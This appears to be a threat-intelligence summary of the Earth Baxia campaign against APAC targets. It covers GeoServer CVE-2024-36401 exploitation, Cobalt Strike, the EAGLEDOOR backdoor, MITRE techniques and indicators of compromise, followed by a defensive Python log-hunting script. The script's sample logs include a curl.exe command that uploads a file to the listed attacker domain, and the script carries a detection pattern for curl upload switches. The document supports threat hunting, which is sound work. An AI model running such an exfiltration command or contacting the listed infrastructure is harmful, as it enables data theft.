“Earth Baxia Targets APAC with Spear-Phishing and GeoServer Exploits”

Earth Baxia, a China-based threat actor, targeted APAC government and critical sectors using spear-phishing and GeoServer CVE-2024-36401, deploying customized Cobalt Strike and a new backdoor named EAGLEDOOR to infiltrate and exfiltrate data. The operation relies on multi-protocol C2 via DNS, HTTP, TCP, and Telegram and appears tied to Alibaba Cloud infrastructure, with activities concentrated in Taiwan and other APAC nations. #EarthBaxia #CVE-2024-36401 #GeoServer #CobaltStrike #EAGLEDOOR #AlibabaCloud

Key points

  • Earth Baxia targeted APAC countries, with notable focus on Taiwan.
  • Initial access combined spear-phishing emails and CVE-2024-36401 GeoServer exploits.
  • Customized Cobalt Strike components were deployed with modified signatures for evasion.
  • A new backdoor, EAGLEDOOR, supports multiple communication protocols for C2 and data collection.
  • Victims span government agencies, telecommunications, and energy sectors across multiple countries; China is the likely base of operations.
  • The GrimResource and AppDomainManager injection techniques were used to deploy additional payloads and evade defenses.
  • Exfiltration leveraged curl.exe; infrastructure tied to public cloud hosting (e.g., Alibaba Cloud).

MITRE Techniques

  • [T1566] Spearphishing Attachment – ‘The attached ZIP file contains a decoy MSC file, which we named RIPCOY.’
  • [T1190] Exploit Public-Facing Application – ‘Exploited CVE-2024-36401 to execute arbitrary commands on GeoServer.’
  • [T1055] Process Injection – ‘AppDomainManager injection, which allows the injection of a custom application domain to execute arbitrary code within the process of the target application.’
  • [T1218] DLL Side-Loading – ‘Executed Cobalt Strike shellcode through DLL side-loading techniques.’
  • [T1071] Command and Control – ‘Utilized multiple protocols (DNS, HTTP, TCP, Telegram) for communication with C&C servers.’
  • [T1003] Credential Dumping – ‘Gathered information from the victim’s machine, including usernames and computer names.’
  • [T1041] Exfiltration Over C2 Channel – ‘Exfiltrated data using curl.exe to send data to their file server.’
  • [T1105] Ingress Tool Transfer – ‘The legitimate .NET applications then proceed to download the next-stage downloader… Most of the download sites identified at this stage were hosted on public cloud services, typically Aliyun.’

Indicators of Compromise

  • [IP] C2/download infrastructure – 167.172.89.142, 167.172.84.142, 152.42.243.170, 188.166.252.85
  • [URL] Malicious/download hosting – static.krislab.site
  • [File Name] Cobalt Strike toolset components – Edge.exe, msedge.dll, Logs.txt
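A practical first step with these indicators is to sweep them across DNS, proxy and endpoint process logs, while also watching for the curl.exe upload behaviour quoted under T1041 above. The script below is an added example written for this summary, not code from the Trend Micro report; the log lines are constructed, the Sysmon-style field names are assumed, and the rule that Edge.exe and msedge.dll are only suspicious outside the Microsoft Edge install directory is an assumption made here, because both names are also legitimate Edge components and would otherwise flood a hunt with false positives.

```python
"""Sweep constructed DNS, proxy and endpoint log lines for the Earth Baxia
indicators listed above.  Added example; not code from the report."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators copied from the IoC list above.
IOC_IPS = {"167.172.89.142", "167.172.84.142", "152.42.243.170", "188.166.252.85"}
IOC_DOMAINS = {"static.krislab.site"}
IOC_FILENAMES = {"edge.exe", "msedge.dll", "logs.txt"}

# Assumption: a genuine Microsoft Edge install lives under this directory.  The
# report's Edge.exe/msedge.dll pair is a side-loading lure, so those names are
# only interesting when they turn up somewhere else (e.g. a user's Temp folder).
EDGE_INSTALL_DIR = "\\microsoft\\edge\\application\\"

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
# Windows path ending in .exe/.dll/.txt; segments may contain spaces but not '='.
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\(?:[^\\=]+\\)*[^\\=]+?\.(?:exe|dll|txt)\b", re.I)
# curl invoked with a switch that sends a local file or body to a remote host
# (real curl options); this is the T1041 behaviour, independent of any IoC.
CURL_UPLOAD_RE = re.compile(
    r"\bcurl(?:\.exe)?\b.*\s(?:-T|--upload-file|-F|--form|-d|--data(?:-binary)?)\s",
    re.I,
)


@dataclass(frozen=True)
class Hit:
    line_no: int
    kind: str       # "ip", "domain", "filename" or "behaviour"
    indicator: str  # the matched value (full path for filename hits)


def scan_line(line_no: int, line: str) -> list[Hit]:
    """Return every indicator or behaviour match found in one log line."""
    hits: list[Hit] = []
    for ip in sorted(set(IPV4_RE.findall(line))):
        if ip in IOC_IPS:
            hits.append(Hit(line_no, "ip", ip))
    for host in sorted({h.lower() for h in HOST_RE.findall(line)}):
        if host in IOC_DOMAINS:
            hits.append(Hit(line_no, "domain", host))
    for path in WIN_PATH_RE.findall(line):
        name = path.rsplit("\\", 1)[-1].lower()
        # File-name IoCs are weak: report them only with a path outside Edge's home.
        if name in IOC_FILENAMES and EDGE_INSTALL_DIR not in path.lower():
            hits.append(Hit(line_no, "filename", path))
    if CURL_UPLOAD_RE.search(line):
        hits.append(Hit(line_no, "behaviour", "curl upload"))
    return hits


def scan(lines: list[str]) -> list[Hit]:
    """Scan a batch of log lines, numbering them from 1."""
    hits: list[Hit] = []
    for n, line in enumerate(lines, 1):
        hits.extend(scan_line(n, line))
    return hits


# Constructed sample telemetry (not real logs); Sysmon-style field names assumed.
SAMPLE_LOGS = [
    "2024-09-10T08:01:12Z dns client=10.0.0.5 qname=static.krislab.site type=A",
    "2024-09-10T08:01:13Z proxy CONNECT 167.172.89.142:443 user=jdoe",
    "2024-09-10T08:02:40Z sysmon EventID=1 Image=C:\\Users\\jdoe\\AppData\\Local\\Temp\\Edge.exe ParentImage=C:\\Windows\\explorer.exe",
    "2024-09-10T08:02:41Z sysmon EventID=7 Image=C:\\Users\\jdoe\\AppData\\Local\\Temp\\Edge.exe ImageLoaded=C:\\Users\\jdoe\\AppData\\Local\\Temp\\msedge.dll",
    "2024-09-10T08:05:00Z sysmon EventID=1 Image=C:\\Windows\\System32\\curl.exe CommandLine=curl.exe -T C:\\Users\\jdoe\\AppData\\Local\\Temp\\Logs.txt http://static.krislab.site/up",
    "2024-09-10T08:06:00Z dns client=10.0.0.7 qname=www.microsoft.com type=A",
    "2024-09-10T08:07:00Z sysmon EventID=7 Image=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe ImageLoaded=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\128.0.0.0\\msedge.dll",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit.line_no}: {hit.kind:9} {hit.indicator}")
```

Run directly, it prints eight hits across the first five sample lines and nothing for the benign Microsoft lookups and the genuine Edge load. The curl check keys on real upload switches (-T, -F, -d and their long forms) rather than on the listed domain, so a legitimate user script that uploads a file will also fire; treat that hit as a pivot point and check the destination host, the uploaded file's name and the parent process before escalating.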

Read more: https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html